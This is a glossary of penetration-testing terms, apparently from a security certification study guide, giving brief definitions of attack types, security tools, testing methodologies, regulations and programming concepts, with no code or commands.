Glossary of Key Terms

A

access control vestibule A small space with typically two sets of interlocking doors (one of which must close before the second door opens). Formerly known as a mantrap.

account takeover A situation in which an attacker gains access to a user’s account credentials.

active reconnaissance A method of information gathering whereby the tools used actually send out probes to the target network or systems in order to elicit a response that is then used to determine its posture.

administrative controls Policies, rules, or training that is designed and implemented to reduce risk and improve safety.

APK Studio A cross-platform and open-source tool for reverse engineering Android applications. You can download APK Studio from https://vaibhavpandey.com/apkstudio/.

ApkX An Android APK decompiler. ApkX can be downloaded from https://github.com/b-mueller/apkx.

arithmetic operator A mathematical operation (such as addition, subtraction, multiplication, division, or modulus) that performs a calculation on two operands.

ARP cache poisoning A type of attack that leads to an on-path attack scenario. It can target hosts, switches, and routers connected to a Layer 2 network by poisoning the ARP caches of systems connected to the subnet and by intercepting traffic intended for other hosts on the subnet. Also known as ARP spoofing.

array A special variable that holds more than one value at a time.

authenticated scan A vulnerability scan in which the user provides the scanner with a set of credentials that have root-level access to the system. Most of the time it is best to run this type of scan against a target to get a full picture of the attack surface.

authority A social engineering technique whereby an attacker uses confidence and legal, organizational, or social authority to convince targets to reveal information.

B

badge cloning attack An attack in which an attacker clones a badge or a card used to access a building. This can be done with specialized software and hardware. It can also be carried out with the aid of social engineering techniques to impersonate employees/authorized users to enter a building with a simple badge copy.

Bash shell A Linux/Unix shell and command language written by Brian Fox as a replacement for the Bourne shell.

bind shell An attack in which an attacker opens a port or a listener on a compromised system and waits for a connection. This is done in order to connect to the victim from any system and execute commands and further manipulate the victim.

BLE attack An attack launched against a Bluetooth Low Energy (BLE) implementation.

blind (or inferential) SQL injection A type of attack in which the attacker does not make the application display or transfer any data but instead reconstructs the information by sending specific statements and discerning the behavior of the application and database.

BloodHound A single-page JavaScript web application that uses graph theory to reveal the hidden relationships within a Windows Active Directory environment.

Bluejacking An attack that can be performed by using Bluetooth with vulnerable devices in range and is mostly performed as a form of spam over Bluetooth connections. An attacker sends unsolicited messages to the victim over Bluetooth, including a contact card (vCard) that typically contains a message in the name field.

Bluesnarfing A type of attack whose aim is to obtain unauthorized access to information from a Bluetooth-enabled device. An attacker may launch Bluesnarfing attacks to access calendars, contact lists, emails and text messages, pictures, or videos from victims.

Boolean operator A programming language construct that evaluates to true or false.

Boolean SQL A technique that is typically used with blind SQL injection attacks in which Boolean queries are used against an application to try to understand the reason for error codes.

Browser Exploitation Framework (BeEF) A tool that can be used to manipulate users by leveraging XSS vulnerabilities.

Burp Suite A collection of tools (including web proxy capabilities) that are used to find vulnerabilities in web applications. You can download Burp Suite from https://portswigger.net/burp/communitydownload.

business logic flaw A method of entry in which an attacker uses legitimate transactions and flows of an application in a way that results in a negative behavior or outcome.

C

Cain A password cracking tool for Windows.

call spoofing tool A tool used to change the caller ID information that is displayed on a phone, typically as part of a social engineering attack.

Censys A company that provides information about Internet threats and threat intelligence and that maintains a database of OSINT information that can be used in passive reconnaissance.

certificate pinning The process of associating a mobile app with a particular digital certificate of a server to avoid accepting any certificate signed by a trusted CA and reduce the attack surface.

CeWL A tool that can be used to create wordlists from websites.

class A code template that can be used to create objects. Classes provide initial values for state variables and implement member functions and/or methods.

cloud malware injection attack An attack in which malware is injected into cloud-based applications.

command and control (C2 or CnC) A type of system that attackers use to send commands and instructions to compromised systems. A C2 can be an attacker’s system (desktop, laptop, and so on) or a dedicated virtual or physical server. Attackers often use virtual machines in a cloud service or even other compromised systems or services such as Twitter or Dropbox. C2 communication can be as simple as maintaining a timed beacon, or “heartbeat,” to launch additional attacks or for data exfiltration.

command injection An attack in which the attacker tries to execute commands that he or she is not supposed to be able to execute on a system via a vulnerable application. Command injection attacks are possible when an application does not validate data supplied by the user (for example, data entered in web forms, cookies, HTTP headers, and other elements). The vulnerable system passes that data into a system shell. This type of attack involves trying to send operating system commands so that the application can execute them with the privileges of the vulnerable application.

comma-separated values (CSV) A plaintext file that contains data delimited by commas (,) and sometimes tabs or other characters, such as semicolons (;).

compliance scan A scan that is typically driven by the market or governance that the environment serves. An example of this would be the information security environment for a healthcare entity, which would be beholden to the requirements set forth in HIPAA.

conditional A programming language command that is used for handling decisions.

covert channel An adversarial technique in which an attacker transfers information objects between processes or systems that are not supposed to be allowed to communicate, according to a security policy.

CrackMapExec A post-exploitation tool that can be used to automate the assessment of Active Directory (AD) networks. You can obtain more information about CrackMapExec from https://github.com/byt3bl33d3r/CrackMapExec.

credential harvesting The act of stealing credentials from systems.

cross-site request forgery (CSRF/XSRF) A type of attack that involves unauthorized commands being transmitted from a user who is trusted by the application. CSRF is different from XSS in that it exploits the trust that an application has in a user’s browser. CSRF vulnerabilities are also referred to as “one-click attacks” or “session riding.” CSRF attacks typically affect applications (or websites) that rely on a user’s identity.

cross-site scripting (XSS) A very common web application vulnerability that can lead to installation or execution of malicious code, account compromise, session cookie hijacking, revelation or modification of local files, or site redirection. There are three major types of XSS: reflected XSS, stored (persistent), and DOM-based XSS.

C-suite The upper or executive-level managers within a company. Common c-suite executives include chief executive officer (CEO), chief financial officer (CFO), chief operating officer (COO), chief information officer (CIO), and chief security officer (CSO).

D

data exfiltration The act of deliberately moving sensitive data from inside an organization to outside an organization’s perimeter without permission.

denial-of-service (DoS) attack An attack that is meant to bring down a system or a network and cause disruption.

dependency vulnerability A vulnerability in a third-party dependency.

dictionary A collection of data values that are ordered using a key/value pair.

DirBuster A web application directory enumeration tool.

directory traversal A vulnerability that can allow an attacker to access files and directories that are stored outside the web root folder. Also known as path traversal.

direct-to-origin attack An attack in which an attacker attempts to reveal the origin network or IP address of a system and attack it directly, thus bypassing anti-DDoS mitigations provided by CDN implementations.

disassociation attack An attack in which an attacker disassociates (tries to disconnect) the user from the authenticating wireless AP and then carries out another attack to attain the user’s valid credentials.

discovery scan A type of vulnerability scan that is primarily meant to identify the attack surface of a target. A port scan is a major part of a discovery scan.

DNS cache poisoning The manipulation of the DNS resolver cache through the injection of corrupted DNS data. This is done to force the DNS server to send the wrong IP address to the victim, redirecting the victim to the attacker’s system.

DNS lookup A method used to determine the IP address or addresses of a domain and its subdomains.

domain enumeration The process of determining all the subdomains that are being used by a target. Domain enumeration helps a penetration tester determine what kinds of systems the target is running and where testing should go next. It often uncovers subdomains that may have been forgotten, which could open up paths to exploitation.

Drozer An Android testing platform and framework that provides access to numerous exploits that can be used to attack Android platforms. You can download Drozer from https://labs.f-secure.com/tools/drozer.

Dumpster diving A process in which an unauthorized individual searches for and attempts to collect sensitive information from the trash.

E

Empire An open-source PowerShell-based post-exploitation framework.

ethical hacker A person who hacks into a computer network in order to test or evaluate its security rather than with malicious or criminal intent.

Ettercap A tool used to perform on-path attacks. You can download Ettercap from https://www.ettercap-project.org.

evil twin An attack in which an attacker creates a rogue access point and configures it exactly the same as the existing corporate network.

Exif Exchangeable image file format, which provides information from graphic files, as well as the information discovered through the URL of a scanned website.

Extensible Markup Language-Remote Procedure Call (XML-RPC) A protocol in legacy applications that uses XML to encode calls and leverages HTTP as a transport mechanism.

F

fear A social engineering technique whereby an attacker convinces a victim to act quickly to avoid or rectify a dangerous or painful situation.

Federal Risk and Authorization Management Program (FedRAMP) A standard used by the U.S. government to authorize the use of cloud service offerings. You can obtain information about FedRAMP at https://www.fedramp.gov.

federated authentication A method of associating a user’s identity across different identity management systems. For example, every time that you access a website, web application, or mobile application that offers you to log in or register with your Facebook, Google, or Twitter account, that application is using federated authentication.

fileless malware Legitimate tools and installed applications in Windows, Linux, or macOS that are used to perform post-exploitation activities. Also referred to as living-off-the-land.

Fingerprinting Organization with Collected Archives (FOCA) A tool used to find metadata and hidden information in documents.

Frida A reverse engineering and instrumentation toolkit that can be downloaded from https://frida.re.

full scan A scan in which every scanning option in the scan policy is enabled. Although the options vary depending on the scanner, most vulnerability scanners have similar categories of options defined.

function A piece of code that is very useful when you need to execute the similar tasks over and over.

G

GDB The GNU Project Debugger, a debugger that runs in many Unix-based systems and that supports several programming languages, including C, C++, Objective-C, Fortran, and Go.

General Data Protection Regulation (GDPR) A European regulation that includes strict rules around the processing of data and privacy. One of the GDPR’s main goals is to strengthen and unify data protection for individuals within the European Union (EU), while addressing the export of personal data outside the EU. You can obtain additional information about GDPR at https://gdpr-info.eu.

Gobuster A directory and file enumeration tool.

group enumeration The process of gathering a valid list of groups in order to understand the authorization roles being used on a target system. An attacker may perform group enumeration after gaining access to the internal network.

H

Hashcat A powerful password cracking tool.

Health Insurance Portability and Accountability Act of 1996 (HIPAA) A standard and regulation that protects an individual’s electronic health information while permitting appropriate access and use of that information by healthcare providers and other entities. Information about HIPAA can be obtained from https://www.cdc.gov/phlp/publications/topic/hipaa.html.

horizontal privilege escalation The process of using a regular user account to access functions or content reserved for non-root or non-admin users.

host enumeration The process of discovering all the hosts, applications, and systems in a network that could be targeted. It can be performed internally and externally, using a tool such as Nmap or Masscan. External host enumeration typically limits the IP addresses being scanned to just the ones that are within the scope of the test. This reduces the chance of inadvertently scanning an IP address that the tester is not authorized to test. When performing an internal host enumeration, a tester typically scans the full subnet or subnets of IP addresses being used by the target.

Hydra A tool that can be used to perform brute-force attacks.

I

IDA A commercial reverse engineering tool.

identity and access management (IAM) The process of administering user and application authentication and authorization. Key IAM features include single sign-on (SSO), multifactor authentication, and user provisioning and life cycle management.

Immunity Debugger A debugger that can be used to disassemble and reverse engineer programs. You can obtain additional information about the Immunity Debugger at https://www.immunityinc.com/products/debugger/

Impacket tools A collection of Python classes for working with network protocols that can be downloaded from https://github.com/SecureAuthCorp/impacket.

impersonation See pretexting.

industrial control system (ICS) A type of system that is used in manufacturing plants, industrial process control, nuclear power plants, water control systems, and other critical infrastructure.

Industrial Internet of Things (IIoT) A network of industrial control systems connected to the Internet.

Information Systems Security Assessment Framework (ISSAF) A penetration testing methodology that consists of the following phases: information gathering, network mapping, vulnerability identification, penetration, gaining access and privilege escalation, enumerating further, compromising remote users/sites, maintaining access, and covering the tracks.

insider threat A threat that occurs when an entity has authorized access (that is, within the security domain) and could potentially harm an information system or enterprise through destruction, disclosure, modification of data, and/or DoS.

Intelligent Platform Management Interface (IPMI) A computer interface that is used in many modern servers and provides management and monitoring capabilities independently of the underlying operating system, system CPU, and firmware.

J

jamming Blocking wireless signals or causing wireless network interference to create a full or partial DoS condition in a wireless network.

JavaScript A very popular programming language used to build web applications.

JavaScript Object Notation (JSON) A lightweight format for storing and transporting data that is easy to understand. It is the most common data structure in RESTful APIs and many other implementations.

job rotation The practice of allowing employees to rotate from one team to another or from one role to a different one. It allows individuals to learn new skills and get more exposure to other security technologies and practices.

John the Ripper A password cracking tool.

K

Kerberoasting A post-exploitation activity in which an attacker extracts service account credential hashes from Active Directory for offline cracking.

key rotation The process of retiring an encryption key and replacing it by generating a new cryptographic key.

key/value pair A data representation of a name and a value. Also referred to as name/value pair or field/value pair.

known-environment testing Testing in which the tester starts out with a significant amount of information about the organization and its infrastructure (for example, network diagrams, IP addresses, configurations, and a set of user credentials). The goal with this type of test is to identify as many security holes as possible. Formerly known as white-box penetration testing.

L

lateral movement A post-exploitation technique that involves moving from one device to another to avoid detection, steal sensitive data, and maintain access to these devices to exfiltrate the sensitive data. Also referred to as pivoting.

LDAP injection An input validation vulnerability that an attacker uses to inject and execute queries to LDAP servers. A successful LDAP injection attack can allow an attacker to obtain valuable information for further attacks on databases and internal applications.

library A collection of resources that can be reused by programs.

likeness A social engineering tactic that takes advantage of the fact that individuals can be influenced by things or people they like. Social engineers take advantage of this human vulnerability to manipulate their victims.

list A data structure in a programming language that contains an ordered assortment of elements.

living-off-the-land The use of legitimate tools and installed applications in Windows, Linux, or macOS to perform post-exploitation activities. Also referred to as fileless malware.

loop A programming logic construct used for repeated execution of a section of code.

M

Maltego A passive reconnaissance tool that can be used to obtain information about people, companies, and other targets.

master service agreement (MSA) A contract that can be used to quickly negotiate the work to be performed. An MSA is beneficial when you perform a penetration test, and you know that you will be rehired on a recurring basis to perform additional tests in other areas of the company or to verify that the security posture of the organization has been improved as a result of prior testing and remediation.

Media Access Control (MAC) spoofing An attack in which a threat actor impersonates the MAC address of another device (typically an infrastructure device such as a router).

Medusa A password cracking tool.

metadata service attack An attack in which an attacker leverages cloud metadata services to compromise the underlying application or system.

Metasploit A collection of tools and modules that can be used to exploit numerous vulnerabilities, for command and control, and to create payloads.

Meterpreter A post-exploitation module that is part of the Metasploit framework.

Mimikatz An open-source malware program used by hackers and penetration testers to gather credentials on Windows computers.

mitm6 An on-path attack tool.

MITRE ATT&CK A penetration testing framework/methodology.

Mobile Security Framework (MobSF) A mobile application pen testing and malware analysis framework that can be downloaded from https://github.com/MobSF/Mobile-Security-Framework-MobSF.

N

Nessus A vulnerability scanner created by Tenable.

network share enumeration The process of identifying systems on a network that are sharing files, folders, and printers, which is helpful in building out the attack surface of the internal network.

Nikto An open-source web application vulnerability scanner.

NIST The National Institute of Standards and Technology, which is a part of the U.S. Department of Commerce that helps provide organizations with guidelines on planning and conducting information security testing.

non-disclosure agreement (NDA) A legal document and contract between a penetration tester and an organization that has hired the tester which specifies and defines confidential material, knowledge, and information that should not be disclosed and that should be kept confidential by both parties.

Nslookup A tool used to resolve DNS domain names.

O

OllyDbg A Windows application debugger.

on-path attack An attack in which an attacker places himself or herself in-line between two devices or individuals that are communicating in order to eavesdrop (steal sensitive data) or manipulate the data being transferred (such as performing data corruption or data modification). On-path attacks can happen at Layer 2 or Layer 3. Previously known as man-in-the-middle (MITM) attack.

open-source intelligence (OSINT) gathering A method of gathering publicly available intelligence sources in order to collect and analyze information about a target. With OSINT, the collecting of information does not require any type of covert methods.

Open Source Security Testing Methodology Manual (OSSTMM) A document that lays out repeatable and consistent security testing.

Open Vulnerability Assessment Scanner (Open VAS) An open-source security vulnerability scanner.

Open Web Application Security Project (OWASP) A nonprofit organization with local chapters around the world that provides significant guidance on how to secure applications.

operational controls Controls that focus on day-to-day operations and strategies. They are implemented by people instead of machines and ensure that management policies are followed during intermediate-level operations.

OWASP Top 10 A list of the top 10 application security risks published by OWASP.

OWASP Zed Attack Proxy (ZAP) An open-source web application security created by OWASP to identify HTTP parameter pollution (HPP) vulnerabilities.

P

passive reconnaissance A method of information gathering in which the tool does not interact directly with the target device or network. There are multiple methods of passive reconnaissance. Some involve using third-party databases to gather information, and others use tools in such a way that they will not be detected by the target.

Patator A multithreaded tool that can be used to perform password guessing attacks and that can be downloaded from https://github.com/lanjelot/patator.

patching fragmentation A challenge in Android-based implementations that is related to the numerous Android versions that are supported or not supported by different mobile devices. Attackers can leverage these compatibility issues and limitations to exploit vulnerabilities.

PCI DSS A regulation that aims to secure the processing of credit card payments and other types of digital payments. PCI DSS specifications, documentation, and resources can be accessed at https://www.pcisecuritystandards.org.

penetration testing Security testing in which evaluators mimic real-world attacks in an attempt to identify ways to circumvent the security features of an application, a system, or a network. Penetration testing often involves issuing real attacks on real systems and data, using the same tools and techniques used by actual attackers. Most penetration tests involve looking for combinations of vulnerabilities on a single system or multiple systems that can be used to gain more access than could be achieved through a single vulnerability.

Penetration Testing Execution Standard (PTES) A penetration testing methodology standard/guidance document that provides information about types of attacks and methods and also provides information on the latest tools available to accomplish the testing methods outlined.

Perl A programming language. You can download and obtain information about Perl at perl.org.

phishing A threat in which an attacker presents to a user a link or an attachment that looks like a valid, trusted resource. When the user clicks it, he or she is prompted to disclose confidential information such as a username and password.

physical controls Controls that use security measures to prevent or deter unauthorized access to sensitive locations or material.

port scan An active scan in which the scanning tool sends various types of probes to the target IP address and examines the responses to determine whether the service is actually listening.

Postman An application used to test APIs.

PowerShell A Windows command language and shell.

PowerShell [PS] Remoting A basic feature that a system administrator can use to access and manage a system remotely. An attacker can also take advantage of this feature to perform post-exploitation activities.

PowerSploit A collection of PowerShell modules that can be used for post-exploitation and other phases of an assessment.

pretexting A form of impersonation in which a threat actor presents himself or herself as someone else in order to gain access to information.

privilege escalation The act of gaining access to resources that normally would have been protected from an application or a user. There are two types of privilege escalation attacks: vertical and horizontal.

procedure A section of code that is created to perform a specific task.

PsExec A utility used for executing processes on a Windows system.

Python A very popular programming language that can be used to create numerous types of applications.

R

rainbow table A precomputed table used to derive a password by looking at the hashed value.

reconnaissance The first step a threat actor takes when planning an attack, which involves gathering information about the target.

Recon-ng A passive reconnaissance tool that supports different modules and integrations with third-party tools and resources.

reflected XSS A type of attack that occurs in non-persistent XSS when malicious code or scripts are injected by a vulnerable web application using any method that yields a response as part of a valid HTTP request.

Responder A tool that can be used to respond to LLMNR and NBT-NS requests and steal credentials. You can download Responder from https://github.com/lgandx/Responder.

RESTful API A type of application programming interface (API) that conforms to the specification of the representational state transfer (REST) architectural style and allows for interaction with web services.

reverse engineering A detailed examination of a system’s or software composition. Attackers use reverse engineering techniques to understand how a device, process, or program was designed and constructed in order to exploit it. Similarly, security professionals use reverse engineering techniques to analyze malware.

reverse shell A vulnerability in which an attacking system has a listener (port open), and the victim initiates a connection back to the attacking system.

role-based access control An access control model based on a specific role or function. Administrators grant access rights and permissions to roles. Users are then associated with a single role.

Ruby A programming language. You can download and obtain information about Ruby from ruby-lang.org.

rules of engagement document Documentation that specifies the conditions under which a security penetration testing engagement will be conducted. A tester needs to document and agree upon these rules of engagement conditions with the client or an appropriate stakeholder.

S

sandbox analysis The analysis of malware in a sandbox, or safe environment.

scarcity A social engineering technique whereby an attacker creates a feeling of heightened urgency in a decision-making context to convince targets to reveal information.

SearchSploit A tool used to download a copy of the Exploit-DB (exploit-db.com) and search downloaded exploits.

secure software development life cycle (SSDLC) The process of incorporating security best practices, policies, and technologies to find and remediate vulnerabilities during the software development life cycle (SDLC). OWASP provides best practices for and guidance on implementing SSDLC at https://owasp.org/www-project-integration-standards/writeups/owasp_in_sdlc.

sensitive data Data that, if compromised, would have a severe impact on an organization.

service enumeration The process of identifying the services running on a remote system. This is the main focus of Nmap port scanning.

service-level agreement (SLA) A well-documented expectation or constraint describing one or more of the minimum and/or maximum performance measures (such as quality, timeline/time frame, and cost) for a network.

session fixation A type of attack in which an attacker intercepts and manipulates web traffic to inject (or fix) the session ID on the victim’s web browser.

shell A utility (software) that acts as an interface between a user and the operating system (the kernel and its services). For example, in Linux there are several shell environments, such as Bash, ksh, and tcsh. In Windows, the shell is the command prompt (command-line interface).

Shodan A search engine for devices connected to the Internet that continuously scans the Internet and exposes its results to users via the website https://www.shodan.io and via an API. Attackers can use this tool to identify vulnerable and exposed systems on the Internet (such as misconfigured IoT devices and infrastructure devices). Penetration testers can use it to gather information about potentially vulnerable systems exposed to the Internet without actively scanning the victim.

Short Message Service (SMS) phishing A phishing exploit that uses SMS to send malware or malicious links to mobile devices.

shoulder surfing A process in which an attacker obtains information such as personally identifiable information (PII), passwords, and other confidential data by looking over a victim’s shoulder.

side-channel attack An attack that is typically based on information gained from the implementation of the underlying computer system (or cloud environment) instead of a specific weakness in the implemented technology or algorithm. The attacker aims to gather information from or influence an application or a system by measuring or exploiting indirect effects of the system or its hardware. Most side-channel attacks are used to exfiltrate credentials, cryptographic keys, or any other sensitive information by measuring coincidental hardware emissions.

Social-Engineer Toolkit (SET) A tool that can be used to launch numerous social engineering attacks and that can also be integrated with third-party tools and frameworks such as Metasploit.

social proof A social engineering technique in which the target is not able to determine the appropriate mode of behavior in a given situation or environment. The attacker establishes what the “normal” behavior is to convince targets to reveal information.

software development kit (SDK) A set of software tools and programs used by developers to create applications.

spamming The act of sending unsolicited email messages.

spear phishing Phishing attempts that are constructed in a very specific way and directly targeted to specific individuals or companies. The attacker studies the victim and the victim’s organization to make emails look legitimate, perhaps even as though they are from trusted users within the corporation.

SQL injection (SQLi) A type of attack in which the attacker inserts, or “injects,” partial or complete SQL queries via a web application. SQL commands are injected into data plane input in order to execute predefined SQL commands.

SQLmap A tool used to automate an SQL injection attack.

stacked queries An attack technique in which queries can be used to execute any SQL statement or procedure. A typical attack using this technique specifies a malicious input statement.

statement of work (SOW) A document that specifies the activities to be performed during a penetration testing engagement.

stealth scan A scan that is run without alerting the defensive position of the environment. It involves implementing a vulnerability scanner in such a manner that the target is unlikely to detect the activity.

steganography The act of hiding a message or other content within an image or video file.

string operator A Python construct used to manipulate values of variables in various useful ways.

supervisory control and data acquisition (SCADA) A set of hardware components and software used to control and interact with devices such as sensors, pumps, motors, valves, and other industrial control systems.

Sysinternals A suite of tools that allows administrators to control Windows-based computers from a remote terminal. It is possible to use Sysinternals to upload, execute, and interact with executables on compromised hosts. The entire suite works from a command-line interface and can be scripted to run commands that can reveal information about running processes and to kill or stop services.

T

tailgating A situation in which an unauthorized individual follows an authorized individual to enter a restricted building or facility.

technical controls Controls that make use of technology to reduce vulnerabilities.

theHarvester A passive reconnaissance tool.

threat actor A person or group who is responsible for a security incident. The main categories of threat actors are organized crime, insider threat, state sponsored, and hacktivist.

time-of-day restrictions Restrictions on user access that are based on the time of the day. For example, you may only allow certain users to access specific systems during working hours.

tree A non-linear data structure represented by nodes in a hierarchical model.

TruffleHog A tool used to search through Git repositories and to obtain sensitive information such as secrets and to analyze code commit history and branches. You can download TruffleHog from https://github.com/trufflesecurity/truffleHog.

U

unauthenticated scan A method of vulnerability scanning that is used to perform a “black box” type of penetration test. It scans only the network services that are exposed to the network because there are no credentials used for access to the target.

Universal Serial Bus (USB) drop key An attack in which an attacker drops USB flash drives loaded with malware in a public place in the hopes that targets will pick them up and, out of curiosity, plug them into systems to see what’s on them. Once one of these drives is plugged in, the malware can automatically run and infect the system.

unknown-environment testing Testing in which the tester is provided only a very limited amount of information (for instance, only the domain names and IP addresses that are in scope for a particular target). The idea of this type of limitation is to have the tester start out with the perspective that an external attacker might have. Formerly referred to as black-box penetration testing.

user enumeration The process of gathering a valid list of users, which is the first step in cracking a set of credentials. Armed with the username, it is possible to begin attempts to brute force the password of the account. User enumeration is performed again after gaining access to the internal network.

V

vertical privilege escalation A situation in which a lower-privileged user accesses functions reserved for higher-privileged users (such as root or administrator access).

virtual local area network (VLAN) hopping A method of gaining access to traffic on other VLANs that would normally not be accessible.

virtual machine (VM) escape An attack in which an attacker can access other VMs or the hypervisor (escape) in order to compromise those systems.

vishing A social engineering attack carried out via a phone conversation. The attacker persuades the user to reveal private personal and financial information or information about another person or a company. Stands for voice phishing.

vulnerability A weakness in an information system or in system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source.

vulnerability scanning A technique used to identify hosts or hosts’ attributes and associated vulnerabilities.

W

w3af A web application scanner.

watering hole attack A targeted attack that occurs when an attacker profiles the websites that the intended victim accesses.

web page enumeration/web application enumeration A process that involves looking at a web application and mapping out the attack surface.

whaling An attack that is similar to phishing and spear phishing except that it is targeted at high-profile business executives and key individuals in a company. Whaling emails are designed to look like critical business emails or as though they come from someone with legitimate authority. Whaling web pages are designed to specifically attract high-profile victims.

Whois A tool used to obtain domain registration information and IP address block ownership information.

WinDbg A Windows-based debugger.

Windows Management Instrumentation (WMI) The infrastructure used to manage data and operations on Windows operating systems. It is possible to write WMI scripts or applications to automate administrative tasks on remote computers. Threat actors use WMI to perform different activities in a compromised system.

Windows Remote Management (WinRM) A legitimate way to connect to Windows systems that can also be useful for post-exploitation activities.